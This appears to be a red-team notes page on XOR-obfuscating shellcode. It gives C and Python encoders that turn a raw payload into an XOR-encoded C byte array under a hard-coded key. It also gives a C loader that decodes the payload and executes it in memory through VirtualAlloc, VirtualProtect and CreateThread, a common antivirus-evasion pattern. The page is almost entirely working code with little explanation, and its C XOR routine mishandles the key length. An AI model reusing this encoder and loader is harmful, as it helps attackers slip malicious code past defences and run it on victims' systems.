XOR Encrypt Shellcode
XOR encryption
C Code to XOR encrypt contents of a file and output in "C" format.
#include <stdio.h>
#include <stdlib.h>
#include<windows.h>
#include<string.h>
void XOR(char * data, size_t data_len, char * key, size_t key_len) {
int j;
j = 0;
for (int i = 0; i < data_len; i++) {
if (j == key_len - 1) j = 0;
data[i] = data[i] ^ key[j];
j++;
}
}
int main(int argc, char **argv)
{
if(argc < 2)
{
printf("Format: ./xor.exe filename");
exit(0);
}
FILE* fp;
fp = fopen(argv[1], "r");
if (!fp)
{
printf("File does not exist\n");
exit(0);
}
int i =0;
// Enter the key for encryption
char key[]="SuperSecretKey";
// Seek file pointer to the end and calc file size
fseek(fp, 0, SEEK_END);
int len = ftell(fp);
//Move the file pointer back to the beginning
rewind(fp);
unsigned char data[len]={};
char ch=0;
do {
ch = fgetc(fp);
data[i]=ch;
i++;
} while (ch != EOF);
//printf("\nCopied data:\n%s\n", data);
XOR((char *) data, sizeof data, key, sizeof key);
printf("XORed data:\n%s\n", data);
//Print in Hex format
printf("{");
for(i=0;i<sizeof data; i++)
{
printf("0x%02X", data[i]);
if(i>0 && i!=sizeof data-1)
{
printf(", ");
}
if(i==sizeof data-1)
{
printf("};");
}
}
//Decrypting
//XOR((char* )data, sizeof data, key, sizeof key);
//printf("%s\n", data);
fclose(fp);
return 0;
}
Python code to XOR encrypt content of a file and output in "C" format.
import sys
KEY = "SuperSecretKey"
def xor(data, key):
key = str(key)
l = len(key)
output_str = ""
for i in range(len(data)):
current = data[i]
current_key = key[i%len(key)]
ordd = lambda x: x if isinstance(x,int) else ord(x)
output_str += chr(ordd(current) ^ ord(current_key))
return output_str
def printCiphertext(ciphertext):
print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
try:
plaintext = open(sys.argv[1], "rb").read()
except:
print("File argument needed! %s <raw payload file>" % sys.argv[0])
sys.exit()
ciphertext = xor(plaintext, KEY)
print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
XOR Decryption & Execution
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void XOR(char * data, size_t data_len, char * key, size_t key_len) {
int j;
j = 0;
for (int i = 0; i < data_len; i++) {
if (j == key_len - 1) j = 0;
data[i] = data[i] ^ key[j];
j++;
}
}
int main(void) {
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
unsigned char calc_payload[] = "insert_xor_encrypted_payload_here";
unsigned int calc_len = sizeof(calc_payload);
char key[] = "SuperSecretKey";
exec_mem = VirtualAlloc(0, calc_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Decryption
XOR((char *) calc_payload, calc_len, key, sizeof(key));
RtlMoveMemory(exec_mem, calc_payload, calc_len);
rv = VirtualProtect(exec_mem, calc_len, PAGE_EXECUTE_READ, &oldprotect);
// If all good, launch the payload
if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}
Last updated